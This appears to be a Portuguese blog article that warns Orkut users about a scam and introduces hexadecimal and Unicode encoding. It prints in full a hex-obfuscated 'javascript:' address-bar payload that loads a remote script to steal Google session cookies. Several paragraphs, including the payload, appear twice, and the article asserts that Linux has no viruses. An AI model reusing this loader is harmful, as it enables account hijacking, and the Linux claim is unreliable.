Codificação e decodificação entre ASCII, hexadecimal e unicode
Sabemos que não existe vírus para Linux, mas existem crackers prontos para invadir qualquer sistema. Defenda-se desvendando mais um dos mistérios dessa turma da codificação e decodificação.
Não seja vítima, defenda-se
Um certo dia estava eu navegando no orkut e recebi uma mensagem que prometia a invasão de uma conta qualquer do orkut através de um script.
Segundo o autor eu deveria entrar no perfil da pessoa escolhida e colar na barra de endereços esse código:
javascript:d=document.createElement('SCRIPT'); d.src='%68%74%74%70%3A%2F%2F%74%69%6E%79%75%72%6C%2E%63%6F %6D%2F%32%64%6E%6F%6B%32'; document.getElementsByTagName('head').item(0).appendChild(d);void(0)
Só que desconfiado como sou, resolvi fazer o seguinte, não confiar nesse script por ter no seu código hexadecimais que o navegador interpreta como caracteres normais.
Como conheço a codificação hexadecimal, resolvi traduzir esse comando, e para a surpresa de todos menos a minha, esse script faz uma chamada a outro script hospedado em uma página fora do orkut e o resultado final é:
Quando você clica nele está autorizando o script a copiar o cookie do orkut no seu computador para o computador do criador dele, dando a esse camarada acesso total à sua conta no Google... isso mesmo! Estamos falando de acesso total ao Gmail, Orkut, Google reader, etc.
Baseado nessa experiência resolvi criar um script em Java que vai codificar e decodificar as palavras para Hexadecimal e Unicode.
Segundo o autor eu deveria entrar no perfil da pessoa escolhida e colar na barra de endereços esse código:
javascript:d=document.createElement('SCRIPT'); d.src='%68%74%74%70%3A%2F%2F%74%69%6E%79%75%72%6C%2E%63%6F %6D%2F%32%64%6E%6F%6B%32'; document.getElementsByTagName('head').item(0).appendChild(d);void(0)
Só que desconfiado como sou, resolvi fazer o seguinte, não confiar nesse script por ter no seu código hexadecimais que o navegador interpreta como caracteres normais.
Como conheço a codificação hexadecimal, resolvi traduzir esse comando, e para a surpresa de todos menos a minha, esse script faz uma chamada a outro script hospedado em uma página fora do orkut e o resultado final é:
Quando você clica nele está autorizando o script a copiar o cookie do orkut no seu computador para o computador do criador dele, dando a esse camarada acesso total à sua conta no Google... isso mesmo! Estamos falando de acesso total ao Gmail, Orkut, Google reader, etc.
Baseado nessa experiência resolvi criar um script em Java que vai codificar e decodificar as palavras para Hexadecimal e Unicode.
mais enfim esse art. vai ajudar alguns inocentes.
p.s: não interpretem mal achei bom o artigo.